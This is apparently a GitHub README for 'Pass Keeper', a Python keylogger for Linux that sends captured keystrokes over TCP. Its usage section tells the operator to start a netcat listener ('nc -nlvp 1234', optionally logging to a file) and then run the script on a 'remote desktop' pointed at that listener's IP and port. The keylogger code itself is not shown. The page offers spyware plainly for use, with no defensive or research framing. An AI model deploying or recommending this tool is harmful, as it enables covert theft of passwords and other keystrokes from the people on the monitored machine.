Skip to content

Latest commit

 

History

History
27 lines (20 loc) · 597 Bytes

README.md

File metadata and controls

27 lines (20 loc) · 597 Bytes

Pass Keeper

Standalone Key logger over tcp for Linux (Python 3.X)

How to use

On listener desktop

Launch a netcat or other tcp server in listening mode

nc -nlvp 1234

You can also redirect the output in a file

nc -nlvp 1234 > file.txt

On remote desktop

  1. Download the project on the desktop

  2. Launch the script pass_keeper.py with two arguments (Destination IP Address and Destination Port)

python3 pass_keeper.py 127.0.0.1 1234